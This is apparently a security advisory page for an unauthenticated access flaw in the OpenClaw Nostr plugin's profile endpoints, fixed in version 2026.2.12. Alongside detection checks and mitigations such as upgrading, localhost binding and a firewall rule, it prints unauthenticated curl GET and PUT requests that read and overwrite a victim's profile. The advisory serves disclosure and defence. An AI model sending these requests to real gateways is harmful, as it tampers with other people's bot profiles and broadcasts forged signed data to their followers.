OpenClaw, Auth Bypass, CVE-2026-XXXXX (High)

Listen to this Post

The OpenClaw Nostr channel plugin, which is optional and disabled by default, exposes profile management HTTP endpoints under `/api/channels/nostr/:accountId/profile` (GET/PUT) and `/api/channels/nostr/:accountId/profile/import` (POST). In versions up to and including 2026.2.9, these routes were dispatched via the gateway plugin HTTP layer without requiring gateway authentication. This design flaw allows an unauthenticated remote attacker to read or mutate the Nostr profile data. Furthermore, any profile updates made through this vulnerability are persisted to the gateway configuration and published as a signed Nostr kind:0 event using the bot’s private key. The vulnerability is exploitable only when the Nostr plugin is installed and enabled, and when the gateway HTTP port is reachable beyond localhost, such as being bound to all interfaces, exposed on a LAN, or made public via a reverse proxy or Tailscale Funnel. The issue was fixed in version 2026.2.12 by requiring gateway authentication for all plugin HTTP requests under `/api/channels/` before they are dispatched to the respective plugin handlers .
Platform: OpenClaw
Version: <=2026.2.9
Vulnerability : Auth Bypass
Severity: High
date: 2026-02-14

Prediction: Patched 2026.2.12

What Undercode Say:

Analytics

The vulnerability stems from a missing authentication check in the gateway’s routing logic for plugin-specific HTTP endpoints, specifically those under /api/channels/nostr/. A fix was merged in commit `647d929c9d0fd114249230d939a5cb3b36dc70e7` as part of the 2026.2.12 release . To determine if your system is affected, you can check the installed version of OpenClaw and verify if the Nostr plugin is present.

Check installed OpenClaw version
npm list openclaw
Check if the Nostr plugin is installed and enabled in your config
grep -r "nostr" /path/to/your/openclaw/config/
Verify if the gateway is bound to all interfaces (making it potentially reachable)
ss -tlnp | grep 18789

How Exploit:

An attacker can directly interact with the exposed API endpoints without any authentication. For example, a simple `curl` command can be used to read or modify the Nostr profile data.

Example: Unauthenticated GET request to read a Nostr profile
curl -X GET http://<victim-ip>:<gateway-port>/api/channels/nostr/targetAccountId/profile
Example: Unauthenticated PUT request to modify the profile
curl -X PUT http://<victim-ip>:<gateway-port>/api/channels/nostr/targetAccountId/profile \
-H "Content-Type: application/json" \
-d '{"name": "Attacker Controlled", "about": "Compromised"}'

Protection from this CVE

The primary mitigation is to update to OpenClaw version 2026.2.12 or later. As an immediate workaround, restrict network access to the gateway by binding it only to localhost and implementing strict firewall rules .

Upgrade OpenClaw to the patched version
npm install [email protected]
Temporary mitigation: Bind gateway to localhost only (modify your start script or config)
Example: If starting with a command-line flag, ensure it's set to 127.0.0.1
openclaw start --host 127.0.0.1
Firewall rule to block external access to the gateway port (e.g., 18789)
sudo iptables -A INPUT -p tcp --dport 18789 ! -s 127.0.0.1 -j DROP

Impact

Successful exploitation allows an unauthenticated, remote attacker to read sensitive profile information and completely overwrite the Nostr profile configuration. This tampered data is persisted in the gateway’s configuration and broadcasted to the Nostr network, potentially damaging the bot’s reputation or misleading its followers .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top